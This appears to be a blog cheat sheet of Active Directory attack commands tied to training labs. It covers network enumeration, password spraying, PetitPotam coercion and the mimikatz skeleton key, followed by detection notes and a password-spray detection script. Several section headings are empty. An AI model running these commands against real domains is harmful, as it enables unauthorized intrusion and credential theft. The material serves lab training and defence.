Active Directory Cheat Sheet for 2025 | Cyber Codex

Active Directory is the spine of enterprise networks — break it, and the whole body collapses.

Welcome to your 2025-ready Active Directory (AD) cheat sheet — a masterkey reference combining offensive, defensive, and investigative commands. Whether you’re mapping domain forests as a red teamer or auditing misconfigs as a blue team analyst, this cheat sheet turns your recon into results.

This isn’t just theory — each section below is inspired by real-world labs and CTFs like TryHackMe’s Attacking AD, Ignite, Wreath, and HackTheBox’s Labs (free tier).

Scan Network & Initial Enumeration

Think of this like taking a flashlight into a dark room — you’re identifying where the machines live and how they talk.

Lab Used: TryHackMe — Ignite (Free)

  • nmap -sP <target_range> — Sweep the subnet for life.

  • nmap -PN -sV --top-ports 50 --open <target_ip> — Fingerprint the top talkers.

  • nmap -PN --script "smb-vuln*" -p139,445 <target_ip> — Check SMB doors for rusty locks (quote the glob so the shell doesn't expand it before nmap sees it).

  • cme smb <target_range> — CrackMapExec meets Samba: Discover shares, users, and more.

Active Directory Discovery

Real-World Feel: Like sneaking into a library and figuring out the floor plan before grabbing the rare books.

Lab Used: TryHackMe — Attacking AD

  • nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL — Sniff out Domain Controllers.

  • dig axfr @dns_server domain.local — (If misconfigured) grab every DNS record.

  • enum4linux -a -u "" -p "" <target_ip> — Anonymous recon.

  • smbmap -u "guest" -p "" -P 445 -H <target_ip> — Test for open access.

Try This in Wreath: Compare anonymous SMB access vs. guest login.

Gaining Foothold: Attacks That Work

This is your beachhead. You’re not deep yet — but you’ve got a toe in the door.

Password Spraying

  • cme smb -u user.txt -p password.txt <target_ip> — Blanket login attempts with caution.

AS-REP Roasting

  • Demo This: TryHackMe — Wreath, where one user lacks pre-auth and leaks hashes.

LLMNR Poisoning + Relays

PetitPotam NTLM Coercion

  • PetitPotam.py -d DOMAIN.LOCAL <attacker_ip> <target_ip> — Weaponized forced auth.

Post-Exploitation & Lateral Movement

This is where it gets cinematic. You’ve got creds. Now you walk the domain.

Real-Lab Example: HackTheBox — Offshore (Free) has this exact flow with SMB shares, BloodHound ops, and user hops.

BloodHound Collection

Enumerate Shares

Kerberoasting

Pass-the-Hash / Key

Domain Dominance

Endgame begins. You now own one machine. Time to own the forest.

Credential Dumping

Golden Ticket

Skeleton Key

  • mimikatz "privilege::debug" "misc::skeleton" — One key to rule them all.

Blue Team & Detection Notes

Defend like a hunter. Here’s what defenders should be doing.

  • Monitor PowerShell logs: Sysmon + WinLogBeat + Elastic.

  • Detect responder/LLMNR poisoning with: Invoke-DetectResponder.ps1

  • Require SMB signing to nullify NTLM relays to SMB (LDAP signing and channel binding cover the LDAP side).

  • Set Audit Directory Services Changes for object manipulation.

  • Rotate the krbtgt password twice after compromise, waiting for replication between the two resets.

TryHackMe — Security Analyst Path offers hands-on SIEM and GPO audit labs.
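The spraying command above and the detection notes here meet in the logs: a spray touches many accounts a couple of times each, so per-account lockout counters never fire, and the signal only appears when you pivot on the source address. The following is an added example, not part of the original cheat sheet, that runs that pivot over constructed 4625 (logon failure) records; the hosts, names and timestamps are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of parsed Windows Security event 4625 (logon failure) records, in
# the shape a SIEM pipeline might emit. Made-up hosts and names, not real log data.
SAMPLE_EVENTS = [
    # (timestamp, source IP, target account, NTSTATUS substatus)
    ("2025-01-10 09:00:01", "10.0.0.50", "alice", "0xC000006A"),
    ("2025-01-10 09:00:03", "10.0.0.50", "bob", "0xC000006A"),
    ("2025-01-10 09:00:05", "10.0.0.50", "carol", "0xC000006A"),
    ("2025-01-10 09:00:07", "10.0.0.50", "dave", "0xC000006A"),
    ("2025-01-10 09:00:09", "10.0.0.50", "erin", "0xC000006A"),
    ("2025-01-10 09:00:11", "10.0.0.50", "frank", "0xC0000064"),  # no such account
    # One user mistyping their own password three times: noise, not a spray.
    ("2025-01-10 09:05:00", "10.0.0.77", "alice", "0xC000006A"),
    ("2025-01-10 09:05:20", "10.0.0.77", "alice", "0xC000006A"),
    ("2025-01-10 09:05:40", "10.0.0.77", "alice", "0xC000006A"),
    # Same host an hour and a half later: outside the window, judged on its own.
    ("2025-01-10 10:30:00", "10.0.0.50", "alice", "0xC000006A"),
    ("2025-01-10 10:30:02", "10.0.0.50", "bob", "0xC000006A"),
]

BAD_PASSWORD = "0xC000006A"   # 4625 substatus: wrong password
NO_SUCH_USER = "0xC0000064"   # 4625 substatus: account does not exist


def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {source_ip: sorted accounts} for sources whose failures in any sliding
    `window` touch >= `min_users` distinct accounts with <= `max_per_user` tries each:
    the low-and-slow shape that stays under lockout, so per-account counters miss it."""
    by_src = defaultdict(list)
    for ts, src, user, status in events:
        if status in (BAD_PASSWORD, NO_SUCH_USER):
            by_src[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user))
    hits = defaultdict(set)
    for src, rows in by_src.items():
        rows.sort()
        start = 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:   # slide the window forward
                start += 1
            per_user = defaultdict(int)
            for _, user in rows[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits[src].update(per_user)
    return {src: sorted(users) for src, users in hits.items()}

if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {src}: {len(users)} accounts -> {users}")
```

Tune `min_users` and `window` to your domain's lockout policy; the per-user cap is what separates a spray from a single user's fat-fingered logins.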

Hash Cracking Cheat Codes

Bonus: Custom Tools & Power Scripts

  • PowerView.ps1 — Swiss army knife for AD enum.

  • SharpHound.exe — Native collector for BloodHound.

  • Invoke-Kerberoast, Invoke-UserHunter, Get-GPPPassword — Part of PowerSploit.

  • adidnsdump — Dumps AD-integrated DNS zones over LDAP to map every host in the domain.

Final Note

This isn’t a cheat sheet — it’s a tactical guide. Pair these commands with real labs, reflect on each step, and don’t memorize — internalize.

“The more silently you move in AD, the louder your skills speak.”
